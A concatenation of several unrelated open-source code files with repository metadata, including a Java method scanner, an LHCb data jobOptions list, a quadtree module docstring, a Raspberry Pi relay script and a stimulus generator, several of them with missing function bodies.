def comfig_complier():
    '''
    Build the "complier" (compiler) helper used to classify methods.

    The misspelled name is preserved for backward compatibility with
    existing callers such as job_start().

    :return: a complier instance from method_analysis_utils.complier
    '''
    return get_complier()
def config_scanner():
    '''
    Build and configure the source scanner with the Java token patterns.

    :return: a scanner instance (from get_scanner()) whose token table has
        been populated via set_token_type().
    '''
    s = get_scanner()
    # Reset per-run scanner state: collected methods and brace counters.
    s.method_list = []
    s.left_single = 0
    s.right_single = 0
    # Token regexes below classify each Java source line.  Each token_type
    # pairs a name with the regex used to recognise it; the dict key is the
    # lookup name used by the scanner.
    # NOTE(review): the original (non-English) comments were stripped by
    # extraction; descriptions below are inferred from the patterns.
    # Access modifiers.
    access_token = token_type("access_token","default|public|protected|private")
    # Other method-level keywords.
    key_token = token_type("key_token","final|abstract|static|synchronized")
    # Line comments ("//...").
    next_token = token_type("next_token","[//]+")
    # A method header ending in ") ... {" on the same line.
    next_method_token = token_type("next_method_token","([a-zA-Z]+)\).*{")
    # General method-implementation line: name, optional spaces, "(args)",
    # optional trailing keywords, then "{".
    imp_token = token_type("imp_token","(.*)([a-zA-Z]+)(\s){0,}(\(.*\))[a-zA-Z\s]{0,}{")
    # Fallback: matches anything not caught by the tokens above.
    invalid_token = token_type("invalid_token",".*")
    # "interface" / "@interface" declarations.
    interface_token = token_type("interface_token","\s(interface)\s|\s(@interface)\s")
    # "class ... {" declarations.
    class_token = token_type("class_token","(class)\s(.*){(.*)")
    # "package" declarations at line start.
    package_token = token_type("package_token","^package")
    # Lines containing an opening brace "{".
    left_single_token = token_type("left_single_token","(.*){(.*)")
    # Lines containing a closing brace "}".
    # NOTE(review): the token name "right_Single_token" has a capital S
    # while the dict key below is all lowercase -- presumably a typo in the
    # original; kept as-is for compatibility.
    right_single_token = token_type("right_Single_token","(.*)}(.*)")
    # Lines containing both "}" and "{" (e.g. "} else {").
    all_single_token = token_type("all_single_token","(.*)}(.*){(.*)")
    token_type_dict = {"access_token":access_token,
                       "key_token":key_token,
                       "next_token":next_token,
                       "next_method_token":next_method_token,
                       "imp_token":imp_token,
                       "invalid_token":invalid_token,
                       "interface_token":interface_token,
                       "class_token":class_token,
                       "package_token":package_token,
                       "left_single_token":left_single_token,
                       "right_single_token":right_single_token,
                       "all_single_token":all_single_token
                       }
    s.set_token_type(token_type_dict)
    return s
def job_start(path):
    '''
    Scan one Java source file and classify its methods as public API or not.

    :param path: path of the Java source file to analyse.
    :return: a list [info_list, public_list, unpublic_list, isClass] where
        info_list holds the cleaned package and class names, public_list /
        unpublic_list hold the classified method lines, and isClass is True
        when the scanner recognised a class in the file.
    '''
    s = config_scanner()
    isClass = False
    # ---- scanning phase ----
    s.read_file(path)
    method_list = s.find_method()
    # NOTE(review): find_method() appears to append an is-class flag
    # (True/False) as the last element of its result; pop(-1) removes it
    # before iterating -- confirm against the scanner implementation.
    if method_list.pop(-1):
        isClass = True
        for m in method_list:
            logging.info(m)
        logger.info("(" + str(len(method_list)) + ") ")
    else:
        logging.info("")
    s.close_file()
    ###########################
    # ---- classification phase ----
    c = comfig_complier()
    # Buckets for the classification results.
    public_list = []
    unpublic_list = []
    info_list = []
    c.complier_start()
    for i in method_list:
        # Non-dict entries are method lines; dict entries carry package /
        # class metadata (keys "package" and "class").
        if type(i) != dict:
            if c.complier_method(i):
                public_list.append(i)
                logger.info("public -> "+i)
            else:
                unpublic_list.append(i)
                logger.info("unpublic -> "+i)
        else:
            try:
                # Strip Java punctuation from the metadata values.
                info_list.append(i["package"].replace(";", "").strip())
                info_list.append(i["class"].replace("{", "").strip())
            except KeyError as e:
                logging.info(str(type(e))+"......"+str(e.args))
        c.complier_close()
    ###########################
    # Returned as: [info, public API methods, non-public methods, isClass].
    return [info_list,public_list,unpublic_list,isClass]
b8014951415d289b10583d9f4dc51aea80536fbd | 4,905 | py | Python | ksteta3pi/Consideredbkg/MC_12_11134011_MagUp.py | Williams224/davinci-scripts | 730642d2ff13543eca4073a4ce0932631195de56 | [
"MIT"
] | null | null | null | ksteta3pi/Consideredbkg/MC_12_11134011_MagUp.py | Williams224/davinci-scripts | 730642d2ff13543eca4073a4ce0932631195de56 | [
"MIT"
] | null | null | null | ksteta3pi/Consideredbkg/MC_12_11134011_MagUp.py | Williams224/davinci-scripts | 730642d2ff13543eca4073a4ce0932631195de56 | [
"MIT"
] | null | null | null | #-- GAUDI jobOptions generated on Mon Jul 20 10:20:49 2015
#-- Contains event types :
#-- 11134011 - 42 files - 900254 events - 251.92 GBytes
#-- Extra information about the data processing phases:
#-- Processing Pass Step-125836
#-- StepId : 125836
#-- StepName : Stripping20-NoPrescalingFlagged for Sim08 - Implicit merging.
#-- ApplicationName : DaVinci
#-- ApplicationVersion : v32r2p1
#-- OptionFiles : $APPCONFIGOPTS/DaVinci/DV-Stripping20-Stripping-MC-NoPrescaling.py;$APPCONFIGOPTS/DaVinci/DataType-2012.py;$APPCONFIGOPTS/DaVinci/InputType-DST.py;$APPCONFIGOPTS/Persistency/Compression-ZLIB-1.py
#-- DDDB : fromPreviousStep
#-- CONDDB : fromPreviousStep
#-- ExtraPackages : AppConfig.v3r164
#-- Visible : Y
#-- Processing Pass Step-127969
#-- StepId : 127969
#-- StepName : Reco14c for MC - 2012
#-- ApplicationName : Brunel
#-- ApplicationVersion : v43r2p11
#-- OptionFiles : $APPCONFIGOPTS/Brunel/DataType-2012.py;$APPCONFIGOPTS/Brunel/MC-WithTruth.py;$APPCONFIGOPTS/Persistency/DST-multipleTCK-2012.py;$APPCONFIGOPTS/Persistency/Compression-ZLIB-1.py
#-- DDDB : fromPreviousStep
#-- CONDDB : fromPreviousStep
#-- ExtraPackages : AppConfig.v3r218
#-- Visible : Y
from Gaudi.Configuration import *
from GaudiConf import IOHelper
IOHelper('ROOT').inputFiles(['LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000001_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000002_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000003_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000004_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000005_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000006_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000007_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000008_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000009_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000010_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000011_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000012_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000013_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000014_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000015_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000016_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000017_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000018_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000019_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000020_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000021_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000022_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000023_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000024_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000025_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000026_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000027_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000029_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000030_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000031_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000032_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000033_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000034_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000035_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000036_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000037_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000038_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000039_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000040_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000041_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000042_2.AllStreams.dst',
'LFN:/lhcb/MC/2012/ALLSTREAMS.DST/00046297/0000/00046297_00000043_2.AllStreams.dst'
], clear=True)
| 62.088608 | 215 | 0.798777 |
b801fafbe89ab89d0893778ef60e2212843497d8 | 12,257 | py | Python | pyqtree.py | GuillemHerrera/Pyqtree | 4f8491ba543ec26b6bf9272ee3e2f0f455eff259 | [
"MIT"
] | null | null | null | pyqtree.py | GuillemHerrera/Pyqtree | 4f8491ba543ec26b6bf9272ee3e2f0f455eff259 | [
"MIT"
] | null | null | null | pyqtree.py | GuillemHerrera/Pyqtree | 4f8491ba543ec26b6bf9272ee3e2f0f455eff259 | [
"MIT"
] | null | null | null | """
# Pyqtree
Pyqtree is a pure Python spatial index for GIS or rendering usage.
It stores and quickly retrieves items from a 2x2 rectangular grid area,
and grows in depth and detail as more items are added.
The actual quad tree implementation is adapted from
[Matt Rasmussen's compbio library](https://github.com/mdrasmus/compbio/blob/master/rasmus/quadtree.py)
and extended for geospatial use.
## Platforms
Python 2 and 3.
## Dependencies
Pyqtree is written in pure Python and has no dependencies.
## Installing It
Installing Pyqtree can be done by opening your terminal or commandline and typing:
pip install pyqtree
Alternatively, you can simply download the "pyqtree.py" file and place
it anywhere Python can import it, such as the Python site-packages folder.
## Example Usage
Start your script by importing the quad tree.
from pyqtree import Index
Setup the spatial index, giving it a bounding box area to keep track of.
The bounding box being in a four-tuple: (xmin, ymin, xmax, ymax).
spindex = Index(bbox=(0, 0, 100, 100))
Populate the index with items that you want to be retrieved at a later point,
along with each item's geographic bbox.
# this example assumes you have a list of items with bbox attribute
for item in items:
spindex.insert(item, item.bbox)
Then when you have a region of interest and you wish to retrieve items from that region,
just use the index's intersect method. This quickly gives you a list of the stored items
whose bboxes intersects your region of interests.
overlapbbox = (51, 51, 86, 86)
matches = spindex.intersect(overlapbbox)
There are other things that can be done as well, but that's it for the main usage!
## More Information:
- [Home Page](http://github.com/karimbahgat/Pyqtree)
- [API Documentation](https://karimbahgat.github.io/Pyqtree/)
## License:
This code is free to share, use, reuse, and modify according to the MIT license, see LICENSE.txt.
## Credits:
- Karim Bahgat
- Joschua Gandert
"""
__version__ = "1.0.0"
#PYTHON VERSION CHECK
import sys
PYTHON3 = int(sys.version[0]) == 3
if PYTHON3:
xrange = range
MAX_ITEMS = 10
MAX_DEPTH = 20
| 34.821023 | 121 | 0.59566 |
b8028a1a0d82b7861ade532f7556efe716f52f14 | 1,136 | py | Python | Day10/calci.py | viditvarshney/100DaysOfCode | eec82c98087093f1aec1cb21acab82368ae785a3 | [
"MIT"
] | null | null | null | Day10/calci.py | viditvarshney/100DaysOfCode | eec82c98087093f1aec1cb21acab82368ae785a3 | [
"MIT"
] | null | null | null | Day10/calci.py | viditvarshney/100DaysOfCode | eec82c98087093f1aec1cb21acab82368ae785a3 | [
"MIT"
] | null | null | null | from logo import logo
symbols = ['+', '-', '/', '*']
operations = {'+': add, '-': subtract,
'*': multiply, '/': divide}
Calci()
| 21.037037 | 100 | 0.529049 |
b805c6c952721423e773c7922c3d8b331193cf4b | 6,089 | py | Python | shoptimizer_api/optimizers_builtin/condition_optimizer.py | leozz37/shoptimizer | a940306cba4040e9d69e1ae2ce077c2a6a108c1f | [
"Apache-2.0"
] | null | null | null | shoptimizer_api/optimizers_builtin/condition_optimizer.py | leozz37/shoptimizer | a940306cba4040e9d69e1ae2ce077c2a6a108c1f | [
"Apache-2.0"
] | null | null | null | shoptimizer_api/optimizers_builtin/condition_optimizer.py | leozz37/shoptimizer | a940306cba4040e9d69e1ae2ce077c2a6a108c1f | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2020 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# python3
"""A module for Shoptimizer API that fixes invalid condition values.
Reference: https://support.google.com/merchants/answer/6324469
If the condition field is specified as "new", but other fields in the
product imply that the condition is otherwise, this optimizer will reset
the condition value to "used".
"""
import logging
from typing import Any, Dict, List, Set
from flask import current_app
from optimizers_abstract import base_optimizer
_NEW = 'new'
_USED = 'used'
| 40.059211 | 84 | 0.702414 |
b805e135095833b9aacb9e146ceaa3844c6781fb | 670 | py | Python | setup.py | comradepopo/p4rmyknife | e34a12a86cc090e3add25dc5baa7f6629586a4c6 | [
"Apache-2.0"
] | null | null | null | setup.py | comradepopo/p4rmyknife | e34a12a86cc090e3add25dc5baa7f6629586a4c6 | [
"Apache-2.0"
] | 1 | 2019-10-18T23:10:11.000Z | 2019-10-18T23:10:11.000Z | setup.py | comradepopo/p4rmyknife | e34a12a86cc090e3add25dc5baa7f6629586a4c6 | [
"Apache-2.0"
] | null | null | null | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
'description': 'P4rmyKnife - The Swiss Army Knife for P4',
'author': 'Assembla, Inc.',
'url': 'https://assembla.com/'
'author_email': 'louis@assembla.com',
'version': '0.1',
'install_requires': [],
'packages': ['p4rmyknife'],
'scripts': [],
'name': 'p4rmyknife'
# Package metadata for p4rmyknife.
# FIX: the original call had no comma after the `url=` argument, which is a
# SyntaxError and made the package uninstallable.
setup(name='p4rmyknife',
      description='P4rmyKnife - The Swiss Army Knife for P4',
      author='Assembla, Inc.',
      url='https://assembla.com/',
      author_email='louis@assembla.com',
      version='0.1',
      install_requires=[],
      packages=['p4rmyknife'],
      scripts=[]
      )
| 25.769231 | 62 | 0.626866 |
b807feaa7b46fd15709c8ce5d95d9ec7f33de619 | 446 | py | Python | utilities/readProperties.py | harry-100/qa-automation-framework | 5fbe03e930820537e53f2d26b1c2b2bd2b222bf5 | [
"MIT"
] | null | null | null | utilities/readProperties.py | harry-100/qa-automation-framework | 5fbe03e930820537e53f2d26b1c2b2bd2b222bf5 | [
"MIT"
] | null | null | null | utilities/readProperties.py | harry-100/qa-automation-framework | 5fbe03e930820537e53f2d26b1c2b2bd2b222bf5 | [
"MIT"
] | null | null | null | from configparser import RawConfigParser
config = RawConfigParser()
config.read("configuration/config.ini")
| 20.272727 | 52 | 0.7287 |
b80bab1732354a9bf5c8b8066aa6d633362ec4a1 | 181 | py | Python | tinyq/__init__.py | mozillazg/tinyq | fd9ecc593931c9b315c4aeb9150389b3e4ae670e | [
"MIT"
] | 14 | 2017-08-02T23:30:16.000Z | 2021-05-31T19:58:29.000Z | tinyq/__init__.py | mozillazg/tinyq | fd9ecc593931c9b315c4aeb9150389b3e4ae670e | [
"MIT"
] | null | null | null | tinyq/__init__.py | mozillazg/tinyq | fd9ecc593931c9b315c4aeb9150389b3e4ae670e | [
"MIT"
] | 2 | 2017-03-13T09:36:05.000Z | 2017-10-27T14:33:48.000Z | # -*- coding: utf-8 -*-
from tinyq.app import Application # noqa
__version__ = '0.3.0'
__author__ = 'mozillazg'
__license__ = 'MIT'
__copyright__ = 'Copyright (c) 2017 mozillazg'
| 22.625 | 46 | 0.696133 |
b80bd1236784afca06c2fdaedb154f5764c38921 | 258 | py | Python | henrietta/tests/__init__.py | zkbt/henrietta | 653d798b241ad5591b704967a0413a2457a4e734 | [
"MIT"
] | null | null | null | henrietta/tests/__init__.py | zkbt/henrietta | 653d798b241ad5591b704967a0413a2457a4e734 | [
"MIT"
] | 12 | 2018-09-12T03:56:04.000Z | 2019-02-15T04:12:53.000Z | henrietta/tests/__init__.py | zkbt/henrietta | 653d798b241ad5591b704967a0413a2457a4e734 | [
"MIT"
] | null | null | null | from .test_lightcurves import *
from .test_statistics import *
from .test_models import *
from .test_fitting import *
from .test_tools import *
from .test_photometry import *
from .test_tpf import *
from .test_imaging import *
from .test_photometry import *
| 25.8 | 31 | 0.790698 |
b80c3a78699daca713934719586192ebb12c7028 | 340 | py | Python | personas.py | Ulzahk/Practica-Python-CRUD | 2657be639bce88e5774f3b16c11ecbb33c41bc83 | [
"MIT"
] | null | null | null | personas.py | Ulzahk/Practica-Python-CRUD | 2657be639bce88e5774f3b16c11ecbb33c41bc83 | [
"MIT"
] | null | null | null | personas.py | Ulzahk/Practica-Python-CRUD | 2657be639bce88e5774f3b16c11ecbb33c41bc83 | [
"MIT"
] | null | null | null |
if __name__ == '__main__':
person = Person('David', 34)
print('Age: {}'.format(person.age))
person.say_hello() | 18.888889 | 87 | 0.585294 |
b80d9fd4d22bb1d71b3dd29f2cdfd01260186b03 | 614 | py | Python | python/right_couch_move.py | ktmock13/PiCouch | 21992efca9fa382c7a02c10fb037a994143038c6 | [
"Apache-2.0"
] | null | null | null | python/right_couch_move.py | ktmock13/PiCouch | 21992efca9fa382c7a02c10fb037a994143038c6 | [
"Apache-2.0"
] | null | null | null | python/right_couch_move.py | ktmock13/PiCouch | 21992efca9fa382c7a02c10fb037a994143038c6 | [
"Apache-2.0"
] | null | null | null | import RPi.GPIO as GPIO
from time import sleep
import sys
# Configure the Raspberry Pi GPIO pins that drive the couch-motor relays.
# NOTE: this is a Python 2 script (statement-form print).
GPIO.setmode(GPIO.BOARD)  # address pins by physical board position
openRelay=11   # board pin wired to the "open" relay
closeRelay=13  # board pin wired to the "close" relay
GPIO.setup(openRelay, GPIO.OUT)
GPIO.setup(closeRelay, GPIO.OUT)
# Command-line arguments: <duration-in-seconds> <opening: true/false>
duration = float(sys.argv[1])
opening = sys.argv[2] in ['true', 'True', '1', 'TRUE']
relay = openRelay if opening else closeRelay  # pick the relay for the requested direction
# Energize the selected relay to start the movement.
GPIO.output(relay, GPIO.HIGH)
print 'starting ' + ('open' if opening else 'close') + ' signal..'
# Hold the relay energized for the requested duration.
print ' ' + str(duration) + 'secs'
sleep(duration)
# De-energize the relay to stop the movement.
print ' ...ending signal'
GPIO.output(relay, GPIO.LOW)
| 20.466667 | 66 | 0.640065 |
b80eb5f1166695a86c73eccb3c18067bd324e51b | 3,725 | py | Python | lib/python3.7/site-packages/dash_bootstrap_components/_components/Popover.py | dukuaris/Django | d34f3e3f09028511e96b99cae7faa1b46458eed1 | [
"MIT"
] | null | null | null | lib/python3.7/site-packages/dash_bootstrap_components/_components/Popover.py | dukuaris/Django | d34f3e3f09028511e96b99cae7faa1b46458eed1 | [
"MIT"
] | 12 | 2020-06-06T01:22:26.000Z | 2022-03-12T00:13:42.000Z | lib/python3.7/site-packages/dash_bootstrap_components/_components/Popover.py | dukuaris/Django | d34f3e3f09028511e96b99cae7faa1b46458eed1 | [
"MIT"
] | null | null | null | # AUTO GENERATED FILE - DO NOT EDIT
from dash.development.base_component import Component, _explicitize_args
| 67.727273 | 432 | 0.720537 |
b81062d8563ac7d8651bf77dad80875a2f3da169 | 3,954 | py | Python | aries_cloudagent/wallet/tests/test_key_pair.py | kuraakhilesh8230/aries-cloudagent-python | ee384d1330f6a50ff45a507392ce54f92900f23a | [
"Apache-2.0"
] | 247 | 2019-07-02T21:10:21.000Z | 2022-03-30T13:55:33.000Z | aries_cloudagent/wallet/tests/test_key_pair.py | kuraakhilesh8230/aries-cloudagent-python | ee384d1330f6a50ff45a507392ce54f92900f23a | [
"Apache-2.0"
] | 1,462 | 2019-07-02T20:57:30.000Z | 2022-03-31T23:13:35.000Z | aries_cloudagent/wallet/tests/test_key_pair.py | kuraakhilesh8230/aries-cloudagent-python | ee384d1330f6a50ff45a507392ce54f92900f23a | [
"Apache-2.0"
] | 377 | 2019-06-20T21:01:31.000Z | 2022-03-30T08:27:53.000Z | from asynctest import TestCase as AsyncTestCase
import json
from ...storage.error import StorageNotFoundError
from ..util import bytes_to_b58
from ..key_type import KeyType
from ...core.in_memory import InMemoryProfile
from ...storage.in_memory import InMemoryStorage
from ..key_pair import KeyPairStorageManager, KEY_PAIR_STORAGE_TYPE
| 35.303571 | 88 | 0.687405 |
b8116854eec000b484014c431645628bfade8561 | 6,191 | py | Python | sonipy/scales/frequency.py | Sabrina-Knappe/sonipy | eaf89afaee0d9c2d5ba7a035d43e651b8919b84e | [
"MIT"
] | 22 | 2020-07-04T19:05:25.000Z | 2022-02-25T08:39:01.000Z | sonipy/scales/frequency.py | Sabrina-Knappe/sonipy | eaf89afaee0d9c2d5ba7a035d43e651b8919b84e | [
"MIT"
] | 6 | 2020-07-07T17:09:00.000Z | 2021-04-12T16:37:41.000Z | sonipy/scales/frequency.py | Sabrina-Knappe/sonipy | eaf89afaee0d9c2d5ba7a035d43e651b8919b84e | [
"MIT"
] | 6 | 2020-07-07T08:28:33.000Z | 2021-12-21T03:52:09.000Z | from __future__ import print_function
import warnings
import numpy as np
C4 = 261.6 # Hz
piano_max = 4186.01 # Hz
piano_min = 27.5000 # Hz - not audible
__all__ = ['cent_per_value','get_f_min','get_f_max','FrequencyScale']
def cent_per_value(f_min, f_max, v_min, v_max):
    """
    Map a frequency range and a data-value range to a slope in cents per value unit.

    Cents are a logarithmic unit of tone intervals
    (https://en.wikipedia.org/wiki/Cent_(music)); one octave spans 1200 cents.

    Parameters
    ----------
    f_min : float
        Minimum frequency.
    f_max : float
        Maximum frequency.
    v_min : float
        Minimum y value.
    v_max : float
        Maximum y value.

    Returns
    -------
    float
        Scale factor in units of cents per y value.
    """
    # Size of the whole [f_min, f_max] interval in cents, spread evenly
    # across the value span [v_min, v_max].
    total_cents = 1200 * np.log2(f_max / f_min)
    return total_cents / (v_max - v_min)
def get_f_min(f_max, cents_per_value, v_min, v_max):
    """
    Compute the minimum frequency implied by a maximum frequency and a cent scale.

    Given the y-value span and a scale in cents per y value, returns the
    minimum frequency that fits such a scale. Cents are a logarithmic unit of
    tone intervals (https://en.wikipedia.org/wiki/Cent_(music)).

    Parameters
    ----------
    f_max : float
        Maximum frequency.
    cents_per_value : float
        A y scale parameter in units of cents/y value.
    v_min : float
        Minimum y value.
    v_max : float
        Maximum y value.

    Returns
    -------
    float
        Minimum frequency.
    """
    # Total interval covered by the value span, expressed in cents.
    span_cents = (v_max - v_min) * cents_per_value
    # Every 1200 cents halves the frequency when walking downward.
    return f_max / (2 ** (span_cents / 1200))
def get_f_max(f_min, cents_per_value, v_min, v_max):
    """
    Compute the maximum frequency implied by a minimum frequency and a cent scale.

    Given the y-value span and a scale in cents per y value, returns the
    maximum frequency that fits such a scale. Cents are a logarithmic unit of
    tone intervals (https://en.wikipedia.org/wiki/Cent_(music)).

    Parameters
    ----------
    f_min : float
        Minimum frequency.
    cents_per_value : float
        A y scale parameter in units of cents/y value.
    v_min : float
        Minimum y value.
    v_max : float
        Maximum y value.

    Returns
    -------
    float
        Maximum frequency.
    """
    # Total interval covered by the value span, expressed in cents.
    span_cents = (v_max - v_min) * cents_per_value
    # Every 1200 cents doubles the frequency when walking upward.
    return f_min * (2 ** (span_cents / 1200))
| 34.977401 | 181 | 0.63237 |
b8118840491eaf33f7fcef02b6ab1cab5378d698 | 338 | py | Python | core_admin/des/ccd/daemon.py | linea-it/tno | f973381280504ceb1b606b5b3ccc79b6b8c2aa4f | [
"MIT"
] | null | null | null | core_admin/des/ccd/daemon.py | linea-it/tno | f973381280504ceb1b606b5b3ccc79b6b8c2aa4f | [
"MIT"
] | 112 | 2018-04-24T19:10:55.000Z | 2022-02-26T16:55:02.000Z | core_admin/des/ccd/daemon.py | linea-it/tno | f973381280504ceb1b606b5b3ccc79b6b8c2aa4f | [
"MIT"
] | null | null | null | from apscheduler.schedulers.background import BackgroundScheduler
from des.ccd import start_pipeline
scheduler = BackgroundScheduler()
scheduler.add_job(
download_queue,
'interval',
# minutes=1
seconds=20,
max_instances=1,
id='des_download_ccd'
)
scheduler.start()
| 16.095238 | 65 | 0.739645 |
b811d6fa0121474e3b20b511fc6bfce131c9ffa7 | 440 | py | Python | calc-app/input_console.py | t4d-classes/python_10042021 | e2c28448ad66784c429655ab766f902b76d6ac79 | [
"MIT"
] | null | null | null | calc-app/input_console.py | t4d-classes/python_10042021 | e2c28448ad66784c429655ab766f902b76d6ac79 | [
"MIT"
] | null | null | null | calc-app/input_console.py | t4d-classes/python_10042021 | e2c28448ad66784c429655ab766f902b76d6ac79 | [
"MIT"
] | null | null | null | from common.input import input_int, input_float
| 20 | 57 | 0.725 |
b811e4d73c683e7404a77a68edf057c683bf41a7 | 1,872 | py | Python | tools/stimgen/gen_recall.py | herenvarno/gsbn | 47ed0932b605d8b3cf9661f9308908364ad5892e | [
"MIT"
] | 2 | 2016-08-12T15:06:02.000Z | 2021-10-05T08:12:17.000Z | tools/stimgen/gen_recall.py | herenvarno/gsbn | 47ed0932b605d8b3cf9661f9308908364ad5892e | [
"MIT"
] | 2 | 2017-04-23T17:22:23.000Z | 2017-05-25T14:22:51.000Z | tools/stimgen/gen_recall.py | herenvarno/gsbn | 47ed0932b605d8b3cf9661f9308908364ad5892e | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import os
import sys
import re
import math
import random
import matplotlib.pyplot as plt
import numpy as np
from google.protobuf import text_format
sys.path.append(os.path.dirname(os.path.realpath(__file__))+"/../../build")
import gsbn_pb2
# Require the output file name as the first command-line argument.
# FIX: the original check was `len(sys.argv) < 1`, which can never be true
# (argv always contains at least the script name), so a missing argument
# crashed with an IndexError below instead of printing this usage message.
if len(sys.argv) < 2:
    print("Arguments wrong! Please retry with command :")
    print("python "+os.path.realpath(__file__)+" <output file name>")
    exit(-1)
filename = sys.argv[1]

patterns = []
masks = []
DIM_HCU = 10  # columns per pattern/mask row
DIM_MCU = 10  # defined but not used below
rd = gsbn_pb2.StimRawData()

# Recall-cue patterns. 0x7fffffff appears to be used as a "no value"
# sentinel; each successive pattern reveals one fewer known element.
p = [0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,2,3,4,5,6,7,8,9]
patterns.append(p)
# NOTE(review): 0xfffffff (seven f's) differs from the 0x7fffffff sentinel
# used everywhere else -- possibly a typo; left unchanged.
p = [0,1,2,3,4,5,6,7,8,0xfffffff]
patterns.append(p)
p = [0,1,2,3,4,5,6,7,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,2,3,4,5,6,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,2,3,4,5,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,2,3,4,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,2,3,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,2,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,1,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)
p = [0,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff,0x7fffffff]
patterns.append(p)

# Masks: presumably 0 disables and 1 enables a column -- verify against
# the consumer of StimRawData.
m = [0,0,0,0,0,0,0,0,0,0]
masks.append(m)
